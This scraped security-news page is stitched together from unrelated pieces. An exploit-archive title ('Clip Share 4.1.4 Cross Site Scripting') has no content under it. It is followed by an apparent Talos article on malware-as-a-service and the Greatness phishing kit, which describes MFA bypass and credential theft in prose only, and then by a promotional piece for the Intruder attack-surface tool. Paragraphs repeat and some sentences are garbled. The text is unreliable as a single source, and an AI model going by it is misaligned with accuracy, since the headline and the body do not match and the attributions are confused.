*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,565)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,751)
*   UNIX (9,266)
*   UnixWare (186)
*   Windows (6,562)
*   Other

Clip Share 4.1.4 Cross Site Scripting

Ransomware-as-a-service is a relatively new version of these commodity groups, such as DarkSide, known for the cyber attack in 2021 that disrupted the Colonial oil pipeline and made gas more expensive for thousands of U.S. consumers.

Wednesday, July 19, 2023 08:07

Whether known as commodity malware or “as-a-service,” threat actors have long been turning to their fellow adversaries in the hopes of selling off their tools and opening a new stream of revenue.

When used legitimately, as-a-service software is when a third-party company offers its software to another company based on a license that is renewed frequently (mostly monthly or yearly) for a fee. The software is centrally hosted on that third-party company’s servers. Think of cloud storage solutions like Dropbox or Plex, for example.

Threat actors have been using this business model for a decade-plus, originally known as commodity malware. This is when threat actors create a suite of malware tools and offer them up for sale on illicit websites. It can range from asking “customers” to pay a monthly fee for access to this set of tools to use in cyber attacks, or users can even pay the original creators to distribute the malware on their behalf and manage the infection.

Recently, this model for threat actors has come to be known as the “as-a-service" model, borrowing the term from the growing trend in the tech industry.

Ransomware-as-a-service is a relatively new version of these commodity groups, such as DarkSide, known for the cyber attack in 2021 that disrupted the Colonial oil pipeline and made gas more expensive for thousands of U.S. consumers.

But other bad actors have since adopted this businesses model, offering every from command and control servers to phishing bots-as-a-service. There are a few reasons why attackers may opt to pay for an as-a-service malware tool for their chosen campaign:

*   As-a-service saves attackers time. When they pay for someone else’s malware kit, whether it be ransomware or a phishing bot, they don’t have to invest time, money or labor to write their own malicious code or tools and instead can hop right into deploying the malware.
*   For the actors and groups who originally created the malware, it is a more reliable income stream for them. Usually, they’d have to hope a successful attack leads to a ransom payment or some sort of other financial windfall. Instead, they can make money by marketing their services to other bad actors for a fee.

*   Bad actors who want to get into the cyber attack business need little to no technical skills to get started. When an attacker pays for an as-a-service malware, they often get an individual login with dedicated customer support, much like any user would with a legitimate piece of software. This way, they can ask questions and receive help if they get stuck during the deployment of the malware. This means that, conceivably, anyone with interest could get involved in starting a cyber attack.
*   As Nick Biasini explained in a past episode of Talos Takes, name recognition also plays a major part in the rising popularity of this business model. Lesser-known threat actors want to piggyback off having a big name associated with them, like DarkSide, to intimidate their actors or lend more credence to the effectiveness of their threats.

**Notable example: Greatness**

Cisco Talos researchers recently discovered Greatness, one of the most advanced phishing-as-a-service tools ever seen in the wild. Our analysis indicates that attackers may have been using attackers since mid-2022.

Greatness offers the ability for users to bypass targets’ multi-factor authentication protections, IP filtering and integration with Telegram bots. Greatness incorporates features seen in some of the most advanced PaaS offerings, such as multi-factor authentication (MFA) bypass, IP filtering and integration with Telegram bots.

Greatness, for now, is only focused on Microsoft 365 phishing pages, providing its affiliates with an attachment and link builder that creates highly convincing decoy and login pages. It contains features such as having the victim’s email address pre-filled and displaying their appropriate company logo and background image, extracted from the target organization’s real Microsoft 365 login page. This makes Greatness particularly well-suited for phishing business users.

Any Greatness affiliates don’t need a specific set of skills. All they need to do is deploy and configure the provided phishing kit with an API key. If used successfully, the attacker can set up a proxy Microsoft 365 authentication system and steal a victim’s authentication credentials or cookies with a “man-in-the-middle" attack.

Greatness is specifically designed to work in a standardized way so that the experience is the same for each customer who buys into the service, potentially allowing anyone with a moderate amount of technical ability to carry out advanced, convincing phishing attacks.

Since as-a-service or commodity malware can include all types of malware, it can be tough to provide specific advice for detection and prevention. For Greatness specifically, anyone implementing multi-factor authentication should opt for code-based authentication through their MFA app of choice, such as Cisco Duo, rather than the easier-to-break method of a simple “yes” or “no” push notification.

Why are there so many malware-as-a-service offerings?

Attack surfaces are growing faster than security teams can keep up. To stay ahead, you need to know what's exposed and where attackers are most likely to strike. With cloud migration dramatically increasing the number of internal and external targets, prioritizing threats and managing your attack surface from an attacker's perspective has never been more important. Let's look at why it's growing

Attack surfaces are growing faster than security teams can keep up. To stay ahead, you need to know what's exposed and where attackers are most likely to strike. With cloud migration dramatically increasing the number of internal and external targets, prioritizing threats and managing your attack surface from an attacker's perspective has never been more important. Let's look at why it's growing, and how to monitor and manage it properly with tools like Intruder.

**What is your attack surface?**

First, it's important to understand that your attack surface is the sum of your digital assets that are 'exposed' – whether the digital assets are secure or vulnerable, known or unknown, in active use or not. This attack surface changes continuously over time, and includes digital assets that are on-premises, in the cloud, in subsidiary networks, and in third-party environments. In short, it's anything that a hacker can attack.

**What is attack surface management?**

Attack surface management is the process of discovering these assets and services and then reducing or minimizing their exposure to prevent hackers exploiting them. Exposure can mean two things: current vulnerabilities such as missing patches or misconfigurations that reduce the security of the services or assets. But it can also mean exposure to future vulnerabilities.

Take the example of an admin interface like cPanel or a firewall administration page – these may be secure against all known current attacks today, but a vulnerability could be discovered in the software tomorrow – when it immediately becomes a significant risk. An asset doesn't need to be vulnerable today to be vulnerable tomorrow. If you reduce your attack surface, regardless of vulnerabilities, you become harder to attack tomorrow.

So, a significant part of attack surface management is reducing exposure to possible future vulnerabilities by removing unnecessary services and assets from the internet. This what led to the Deloitte breach and what distinguishes it from traditional vulnerability management. But to do this, first you need to know what's there.

**Asset management vs vulnerability management**

Often considered the poor relation of vulnerability management, asset management has traditionally been a labour intensive, time-consuming task for IT teams. Even when they had control of the hardware assets within their organization and network perimeter, it was still fraught with problems. If just one asset was missed from the asset inventory, it could evade the entire vulnerability management process and, depending on the sensitivity of the asset, could have far reaching implications for the business.

Today, it's a whole lot more complicated. Businesses are migrating to SaaS and moving their systems and services to the cloud, internal teams are downloading their own workflow, project management and collaboration tools, and individual users expect to customize their environments. When companies expand through mergers and acquisitions too, they often take over systems they're not even aware of – a classic example is when telco TalkTalk was breached in 2015 and up to 4 million unencrypted records were stolen from a system they didn't even know existed.

**Shifting security from IT to DevOps**

Today's cloud platforms enable development teams to move and scale quickly when needed. But this puts a lot of the responsibility for security into the hands of the development teams – shifting away from traditional, centralized IT teams with robust, trusted change control processes.

This means cyber security teams struggle to see what is going on or discover where their assets are. Similarly, it's increasingly hard for large enterprises or businesses with dispersed teams – often located around the world – to keep track of where all their systems are.

As a result, organizations increasingly understand that their vulnerability management processes should be baked into a more holistic 'attack surface management' process because you must first know what you have exposed to the internet before you think about what vulnerabilities you have, and what fixes to prioritize.

**Essential features of attack surface management tools**

Various tools on the market are good for asset discovery, finding new domains which look like yours and spotting websites with similar content to your own. Your team can then check if this is a company asset or not, choose whether it's included in your vulnerability management processes, and how it is secured. But this requires an internal resource because the tool can't do this for you.

Similarly, some tools focus only on the external attack surface. But since a common attack vector is through employee workstations, attack surface management should include internal systems too. Here are three essential features that every attack surface monitoring tool should provide:

**1\. Asset discovery**

You can't manage an asset if you don't know it exists. As we've seen, most organizations have a variety of "unknown unknowns," such as assets housed on partner or third-party sites, workloads running in public cloud environments, IoT devices, abandoned IP addresses and credentials, and more. Intruder's CloudBot runs hourly checks for new IP addresses or hostnames in connected AWS, Google Cloud or Azure accounts.

Intruder's CloudBot automatically adds any new external IP addresses or hostnames in cloud accounts as targets for monitoring & vulnerability scanning.

**2\. Business context**

Not all attack vectors are created equal and the 'context' – what's exposed to the internet – is a vital part of attack surface management. Legacy tools don't provide this context; they treat all attack surfaces (external, internal office, internal datacentre) the same, and so it's hard to prioritize vulnerabilities. Attack surface management tools identify the gaps in your internal and external security controls to reveal the weaknesses in your security that need to be addressed and remediated first.

Intruder takes this a step further and provides insight into any given asset, and the business unit the application belongs to. As an example, knowing whether a compromised workload is a part of critical application managing bank-to-bank SWIFT transactions will help you formulate your remediation plan.

**3\. Proactive and reactive scans**

You can't just test your attack surface once. Every day it continues to grow as you add new devices, workloads, and services. As it grows the security risk grows too. Not just the risk of new vulnerabilities, but also misconfigurations, data exposures or other security gaps. It's important to test for all possible attack vectors, and it's important to do it continuously to prevent your understanding from becoming outdated.

Even better than continuous scanning is a platform that can scan proactively or reactively depending on the circumstances. For example, reacting to a new cloud service being brought online by launching a scan, or proactively scanning all assets as soon as new vulnerability checks become available.

**Reducing your attack surface with Intruder**

Attack surface monitoring tools like **Intruder** do all this and more. Intruder makes sure that everything you have facing the internet is supposed to be – by making it easily searchable and explorable. Its Network View feature shows exactly what ports and services are available, including screenshots of those that have websites or apps running on them.

Most automated tools are great at spitting out data for analysts to look at, but not at reducing the 'noise'. Intruder prioritizes issues and vulnerabilities based on context, or whether they should be on the internet at all. Combined with Intruder's continuous monitoring and emerging threat scans, this makes it much easier and quicker to find and fix new vulnerabilities before they can be exploited.

**Try Intruder for yourself!**

With its attack surface monitoring capabilities, Intruder is solving one of the most fundamental problems in cybersecurity: the need to understand how attackers see your organization, where they are likely to break in, and how you can identify, prioritize and eliminate risk.**_Ready to get started_** ?

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web